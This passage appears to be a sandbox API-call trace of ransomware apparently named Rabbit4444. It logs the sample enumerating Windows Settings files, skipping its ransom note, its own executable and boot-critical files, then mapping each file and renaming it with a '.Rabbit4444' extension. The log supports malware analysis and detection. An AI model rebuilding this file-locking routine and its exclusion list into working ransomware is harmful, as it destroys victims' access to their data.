(lpString1="AAA_SystemSettings_Users_EnrollmentFace.settingcontent-ms", lpString2=".") returned 1 [0058.110] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentFace.settingcontent-ms", lpString2="..") returned 1 [0058.110] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentFace.settingcontent-ms", lpString2="windows") returned -1 [0058.110] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentFace.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.110] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentFace.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.110] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentFace.settingcontent-ms", lpString2="boot") returned -1 [0058.110] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentFace.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.110] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentFace.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.110] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Users_EnrollmentFace.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Users_EnrollmentFace.settingcontent-ms") returned="AAA_SystemSettings_Users_EnrollmentFace.settingcontent-ms" [0058.110] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_EnrollmentFace.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.110] lstrlenW (lpString="AAA_SystemSettings_Users_EnrollmentFace.settingcontent-ms") returned 57 [0058.110] lstrlenW (lpString="Rabbit4444") returned 10 [0058.110] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.110] lstrlenW (lpString=".dll") returned 4 [0058.110] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.110] lstrlenW (lpString=".lnk") returned 4 [0058.110] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.110] lstrlenW (lpString=".ini") returned 4 [0058.110] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.110] lstrlenW (lpString=".sys") returned 4 [0058.110] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.110] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_EnrollmentFace.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_enrollmentface.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.111] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.111] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14942184543) returned 1 [0058.111] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1227) returned 1 [0058.111] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0058.111] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0058.111] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d0, lpName=0x0) returned 0x298 [0058.112] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d0) returned 0x70000 [0058.113] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.113] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0058.113] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.113] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0058.113] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.113] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0058.113] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.113] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0058.114] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14942429421) returned 1 [0058.114] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0058.114] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0058.114] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.114] CloseHandle (hObject=0x298) returned 1 [0058.114] CloseHandle (hObject=0x278) returned 1 [0058.114] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_EnrollmentFace.settingcontent-ms.Rabbit4444") returned 185 [0058.114] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_EnrollmentFace.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_enrollmentface.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_EnrollmentFace.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_enrollmentface.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.115] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d45475f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3d45475f, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Users_EnrollmentFingerprint.settingcontent-ms", cAlternateFileName="AA0705~1.SET")) returned 1 [0058.115] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentFingerprint.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.115] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentFingerprint.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.115] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentFingerprint.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.115] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentFingerprint.settingcontent-ms", lpString2=".") returned 1 [0058.115] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentFingerprint.settingcontent-ms", lpString2="..") returned 1 [0058.115] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentFingerprint.settingcontent-ms", lpString2="windows") returned -1 [0058.115] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentFingerprint.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.115] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentFingerprint.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.115] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentFingerprint.settingcontent-ms", lpString2="boot") returned -1 [0058.115] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentFingerprint.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.115] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentFingerprint.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.115] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Users_EnrollmentFingerprint.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Users_EnrollmentFingerprint.settingcontent-ms") returned="AAA_SystemSettings_Users_EnrollmentFingerprint.settingcontent-ms" [0058.115] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_EnrollmentFingerprint.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.115] lstrlenW (lpString="AAA_SystemSettings_Users_EnrollmentFingerprint.settingcontent-ms") returned 64 [0058.115] lstrlenW (lpString="Rabbit4444") returned 10 [0058.115] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.115] lstrlenW (lpString=".dll") returned 4 [0058.115] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.115] lstrlenW (lpString=".lnk") returned 4 [0058.115] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.115] lstrlenW (lpString=".ini") returned 4 [0058.116] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.116] lstrlenW (lpString=".sys") returned 4 [0058.116] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.116] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_EnrollmentFingerprint.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_enrollmentfingerprint.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.116] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.116] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14942666101) returned 1 [0058.116] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1262) returned 1 [0058.116] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0058.116] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0058.116] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0058.117] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0058.118] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.118] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0058.118] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.118] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.118] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.118] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.118] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.118] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0058.118] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14942925977) returned 1 [0058.119] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0058.119] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0058.119] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.119] CloseHandle (hObject=0x298) returned 1 [0058.119] CloseHandle (hObject=0x278) returned 1 [0058.119] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_EnrollmentFingerprint.settingcontent-ms.Rabbit4444") returned 192 [0058.119] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_EnrollmentFingerprint.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_enrollmentfingerprint.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_EnrollmentFingerprint.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_enrollmentfingerprint.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.120] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d74f6a4, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3d74f6a4, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x238ab028, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Users_EnrollmentIris.settingcontent-ms", cAlternateFileName="AAD756~1.SET")) returned 1 [0058.120] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentIris.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.120] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentIris.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.120] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentIris.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.120] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentIris.settingcontent-ms", lpString2=".") returned 1 [0058.120] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentIris.settingcontent-ms", lpString2="..") returned 1 [0058.120] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentIris.settingcontent-ms", lpString2="windows") returned -1 [0058.120] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentIris.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.120] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentIris.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.120] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentIris.settingcontent-ms", lpString2="boot") returned -1 [0058.120] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentIris.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.120] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentIris.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.120] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Users_EnrollmentIris.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Users_EnrollmentIris.settingcontent-ms") returned="AAA_SystemSettings_Users_EnrollmentIris.settingcontent-ms" [0058.120] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_EnrollmentIris.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.120] lstrlenW (lpString="AAA_SystemSettings_Users_EnrollmentIris.settingcontent-ms") returned 57 [0058.120] lstrlenW (lpString="Rabbit4444") returned 10 [0058.120] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.120] lstrlenW (lpString=".dll") returned 4 [0058.120] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.120] lstrlenW (lpString=".lnk") returned 4 [0058.120] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.120] lstrlenW (lpString=".ini") returned 4 [0058.120] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.121] lstrlenW (lpString=".sys") returned 4 [0058.121] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.121] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_EnrollmentIris.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_enrollmentiris.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.121] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.121] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14943163957) returned 1 [0058.121] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1227) returned 1 [0058.121] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0058.121] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0058.121] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d0, lpName=0x0) returned 0x298 [0058.122] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d0) returned 0x70000 [0058.123] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.123] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0058.123] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.123] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0058.123] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.123] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0058.123] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.123] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0058.123] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14943410992) returned 1 [0058.123] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0058.123] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0058.123] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.124] CloseHandle (hObject=0x298) returned 1 [0058.124] CloseHandle (hObject=0x278) returned 1 [0058.124] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_EnrollmentIris.settingcontent-ms.Rabbit4444") returned 185 [0058.124] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_EnrollmentIris.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_enrollmentiris.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_EnrollmentIris.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_enrollmentiris.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.124] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dae2f29, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3dae2f29, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Users_PicturePassword.settingcontent-ms", cAlternateFileName="AAB78A~1.SET")) returned 1 [0058.124] lstrcmpiW (lpString1="AAA_SystemSettings_Users_PicturePassword.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.124] lstrcmpiW (lpString1="AAA_SystemSettings_Users_PicturePassword.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.125] lstrcmpiW (lpString1="AAA_SystemSettings_Users_PicturePassword.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.125] lstrcmpiW (lpString1="AAA_SystemSettings_Users_PicturePassword.settingcontent-ms", lpString2=".") returned 1 [0058.125] lstrcmpiW (lpString1="AAA_SystemSettings_Users_PicturePassword.settingcontent-ms", lpString2="..") returned 1 [0058.125] lstrcmpiW (lpString1="AAA_SystemSettings_Users_PicturePassword.settingcontent-ms", lpString2="windows") returned -1 [0058.125] lstrcmpiW (lpString1="AAA_SystemSettings_Users_PicturePassword.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.125] lstrcmpiW (lpString1="AAA_SystemSettings_Users_PicturePassword.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.125] lstrcmpiW (lpString1="AAA_SystemSettings_Users_PicturePassword.settingcontent-ms", lpString2="boot") returned -1 [0058.125] lstrcmpiW (lpString1="AAA_SystemSettings_Users_PicturePassword.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.125] lstrcmpiW (lpString1="AAA_SystemSettings_Users_PicturePassword.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.125] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Users_PicturePassword.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Users_PicturePassword.settingcontent-ms") returned="AAA_SystemSettings_Users_PicturePassword.settingcontent-ms" [0058.125] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_PicturePassword.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.125] lstrlenW (lpString="AAA_SystemSettings_Users_PicturePassword.settingcontent-ms") returned 58 [0058.125] lstrlenW (lpString="Rabbit4444") returned 10 [0058.125] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.125] lstrlenW (lpString=".dll") returned 4 [0058.125] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.125] lstrlenW (lpString=".lnk") returned 4 [0058.125] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.125] lstrlenW (lpString=".ini") returned 4 [0058.125] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.125] lstrlenW (lpString=".sys") returned 4 [0058.125] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.125] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_PicturePassword.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_picturepassword.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.126] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.126] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14943648248) returned 1 [0058.126] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1239) returned 1 [0058.126] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0058.126] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0058.126] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x298 [0058.130] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x70000 [0058.130] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.130] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0058.131] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.131] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0058.131] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.131] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0058.131] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.131] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0058.131] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14944168798) returned 1 [0058.131] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0058.131] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0058.131] UnmapViewOfFile 